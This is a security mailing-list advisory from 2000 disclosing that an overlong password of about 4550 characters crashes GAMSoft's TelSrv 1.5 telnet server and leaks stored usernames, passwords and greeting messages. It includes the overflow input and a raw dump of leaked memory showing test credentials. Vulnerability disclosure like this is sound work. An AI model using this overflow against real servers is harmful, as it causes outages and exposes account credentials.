OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: TelSrv Reveals Usernames & Passwords After DoS Attack
From: webster (websterPIS.COM.AU)
Date: Sat Jul 29 2000 - 01:47:09 CDT


----------
Details
----------

Application: GAMSoft's TelSrv 1.5 (could be more... I don't have time to
check, nor do I have the other programs)
Problem Type: Denial of Service Attack - Reveals User Names & Passwords
Author: Patrick Webster (mailto:websterpis.com.au)
Platform: Win95 (could be more again... unable to test)
Risk Factor: High
Credibility: Patrick Webster (mailto:websterpis.com.au)
Vendor Status: Contacted, but no reply.
Vendor Website: http://www.gamsoft.com
Discovered: 20th July, 2000 (Australian)
Reported: 28th July, 2000 (Australian)

-----------------
Introduction
-----------------

*Note: This is my first report, so forgive me if I make any mistakes /
errors etc...

I first discovered this problem when trying to perform the Denial of Service
attack on TelSrv 1.5 which was reported not long ago. I had downloaded
TelSrv on 28 August 1999, and after playing around with it, decided I didn't
need it, thus uninstalling it and forgetting about it. When I received the
DoS report, I remembered I still had the installation, and decided to give
it a go. What was odd, was that when I did it, TelSrv didn't crash, it was
working fine, prompting me for the password. I decided to try sending the
4550 characters as the password, and when I did, TelSrv crashed, sending
back a bunch of unimportant characters. At first I thought these characters
were worthless, until I noticed the message "Welcome Admin!" which was the
message to be displayed upon login by user 'admin'. I then figured that if
it displays the admin login message, it may very well display other hidden
details. I setup another account to test for this - Username: 22222,
Password: 11111. I did the crash again, and to my surprise, there, in the
bunch of junk characters, was the numbers 22222 & 11111! I tried this again,
using different names, such as a1b2c3 and when I tried the crash again, it
displayed what looked like encrypted characters (eg. ?1u23, not accurate
though). With this in mind, I decided that I would find the encrypted values
of each character, by creating account names such as ABCabc123!# an so on,
and writing a program to decrypt this.

I created a text file, which was to contain the encrypted version of the
character and a decrypted version, and while I was using 'cut & paste' to
transfer the encrypted character to the text file, I noticed that the
character had now changed to its real form. The character had changed due to
the difference in DOS characters to Windows characters (??bit - 32bit?), the
DOS characters being shown in telnet & Notepad, whereas the Windows symbols
being shown in Wordpad. This explains why the numbers were the same compared
to the letters which were different. So basically, all you have to do is use
the DoS attack, using 4550 characters (maybe less?) and copy the data which
is forced back, viewing it with Wordpad or the like, and simply looking
through the data for any recognisable words etc. One username always seems
to be displayed after the files path, so that is a start.

----------
Exploit
----------

The problem is bad bounds checking, so that when you connect to the TelSrv
Telnet Server and use 4550 characters as a password, the telnet service
crashes, responding to the client with data containing TelSrv usernames,
passwords & custom login messages. This data can then be used to login to
TelSrv. The only problem is that it crashes the server upon execution.

Start Example:

*Note: For this example, I have created only one account, details are as
follows...

Username: 11111username11111
Password: 22222password22222
Custom Message: This is the custom greeting message!

If you look towards the end of the following code, you will see that
'11111username11111, 22222password22222 & This is the custom greeting
message!' are displayed. They are displayed normally because of the
formatting of this document.

Please Wait...Connection Accepted (TelSrv 1.5)

This copy of TelSrv is not registered. Registration will remove this
message and the 5 second delay...

Username : (none, just hit enter)

Password :
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*********************************************AdjustTokenPriveleges Failed :
%lu
AdjustTokenPriveleges Failed : %lu (%s)
LookupPrivilegeValue Failed : %lu
LookupPrivilegeValue Failed : %lu (%s)
SeShutdownPrivilegeOpenProcessToken Failed : %lu
OpenProcessToken Failed : %lu (%s)

Requesting shutdown priveleges...

Unknown command

Goodbye!
exitError : No priveleges for that operation
dosshutdownShutdown failed! If your host system is Windows NT,
this process does not have priveleges to shut down the system.

Shutting down...
reboothelpPassword :

Error : User database version does not match program version.Note : User
database will be converted to new version of TelSrv.Could not save user
database.No users are defined. Nobody can log in to the
server.S.EXE""%s".DAT.HLPGAMSoftC:\TELSRV.LOG.LOG\LOGIN.WAV\LOGOUT.WAVCTel
srvDlgWhatWhenWhoTelSrv (0 Connections)TelSrv (%d Connections)Number of
connections : %dAre you sure you want to terminate TelSrv?Cant access log
file!!Server%-25s%-25s%s
%d/%d/%d %d:%02d:%02dLogging in...%d.%d.%d.%dPlease Wait...Logged in as
"%s"Login as "%s" failedConnection terminatedFailed to stop the
server.Warning! There are active connection(s). If you stop the server now,
these connections will be terminated.

Are you sure you want to stop the server?Failed to start the server. This
can be caused by several problems :

TCP/IP is not installed on this system.
The port number is invalid.
The port number is already in use by another application.Server
ConfigurationDI_xC/ӝҀkZ LJ_xCXes)75_Px )e
x S x
x SC:\PROGRAM FILES\TELSRV\TELSRV.DAT"C:\PROGRAM
FILES\TELSRV\TELSRVS.EXE"11111username11111)k,!__LQEM%QeS\3?T"
L9!sСZPc'2rny+r6'gv5*1N
522222password22222ɰ*-
CAo1seu/շOD/]b"}FTl7 }[73?!y5֙Ԟg+~vOAo*ǿg
h+>UThis is the custom greeting
message!!?9D5яH4-UM5G$T/a)"{z$LYa2]^
cgU:=9*MYrhVIdw.M7+Jp"ma
ΰK"b/#زMy2
:8""5M;>wdLM'7'U8%X͍U(:?
K5׬{tdRӹī$/d҆bX_/;-vXʹ0
acU͜
`oa
B$'%QnGƟoD%Y\9' zU'.'`;
:^kM]G-BxG&S_nDd>_t-}u'd$r&PY<ބaaaaaaaaaaaa
aaaaaaaaaaaQA-NDNC?i|!(1j#-<xɌY5!UO{-W]h~BM^oW'
"d{u`U*1L$z}gerby"wS-Q{]V5cј%f-Q5yF
8hqCA~(- (\W:%!]Ս()8,FeI-7O$:mh]X# "
WAy59!>J-&ҫ4h6ֻ ̆,]_bn-utv+C&!O d9)L)5xP1
(]VI\ak/A/w<6/ 7eZT
]IyW)?܎

}

b'"vD$$`S83}j
󱀷/xg6Lb̿w1cj-b-EgT
ӳHJ7:'(}c"K-Q-8ǥN4/C"g-d-{U&L[m3(

End Example.

---------
Notes
---------

Some odd things I noticed are things such as that TelSrv did NOT crash everytime I performed the operation. I also noticed that it did not always display the full username, password or whatever you're looking for. Sometimes it didn't even respond with any information, just another login prompt. I noticed that when using Windows95's default telnet application, (telnet.exe), that the information containing the usernames etc. did not convert the usernames to their original form, whereas SecureCRT did correctly display the data, which was what I used for this. There are quite possibly many more interesting things people may come across, people may even wish to look into this further, maybe even figure out where the exact location of the different usernames & passwords occur (if there is any formatting in the data) or maybe there is something else valuable in the data (other than revealing the remote path of the server, in this case C:\PROGRAM FILES\TELSRV\).

--------------
Credibility
--------------

This was discovered by myself (Patrick Webster) around the 20th July 2000 (maybe a day or two earlier), not long after the known DoS attack was released. I acknowledge tha
t I am using the method discovered by someone else in a DoS attack, but I am
yet to receive a report of the DoS attack (being used on the password
prompt) which actually reveals the usernames & passwords of TelSrv, so I
believe none else has discovered it yet :)

--------------
Greetings
--------------

Greets go out to my girlfriend Jo, ZeroX, AkirA, NEO, Blockhead, Lozza,
Chatalade and anyone else I missed...

-Pothead

----------------------------
Contact Information
----------------------------
If I really need to be contacted, you can reach me at either...
mailto:websterpis.com.au (preferred)
or
mailto:dope_squadhotmail.com

Cheers from Australia :) & sorry for the length of this message.

-Patrick Webster